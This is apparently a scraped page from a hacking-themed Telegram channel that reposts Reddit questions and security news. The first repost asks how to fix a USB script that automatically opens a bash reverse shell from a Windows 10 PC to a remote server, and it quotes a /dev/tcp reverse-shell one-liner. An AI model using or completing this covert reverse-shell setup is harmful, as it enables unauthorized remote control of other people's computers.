Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
hacking: security in practice
bash reverse shell not working

I'm making a usb script that automatically sets up a reverse shell that connects a windows 10 PC to my VPC.

The code I'm trying that won't work:

"bash -i >& /dev/tcp/MYCOMPUTERIP/PORT 0>&1"

Output: ">& was unexpected at this time"

If I remove >& to make it

"bash -i /dev/tcp/MYCOMPUTERIP/PORT 0>&1"

My output is:

"Unsupported console settings. In order to use this feature, the legacy console must be disabled"

How can I fix this or is there an alternative to using bash to get a reverse shell on stock windows

If this is elementary I'm sorry. I've never used windows or bash before.

Also posted to r/bash

submitted by /u/Background_Gene_3657
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
what computer should i get?
https://www.reddit.com/r/Pentesting/comments/uwibvc/what_computer_should_i_get/

Currently, I am selling my PC and am going to have a budget between 1k - 1.5k for a laptop. I really prefer a windows laptop so it would be also easier to switch between that and Kali Linux in the future. My question is... What computer should I get? I'm assuming something with 16 GB of Ram, 3.2+ GHz CPU, and possibly a decent GPU. submitted by /u/Psychological-Ad6935 (https://www.reddit.com/user/Psychological-Ad6935)
[link] (https://www.reddit.com/r/Pentesting/comments/uwibvc/what_computer_should_i_get/) [comments] (https://www.reddit.com/r/Pentesting/comments/uwibvc/what_computer_should_i_get/)

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
QuSecure Carves Out Space in Quantum Cryptography With Its Vision of a Post-RSA World

NIST may be on the brink of revealing which post-quantum computing encryption algorithms it is endorsing, solidifying commercial developments like QuProtect.
Intranet Asset Vulnerability Scanning Tool

IntroductionContinue reading on Medium »
Read more...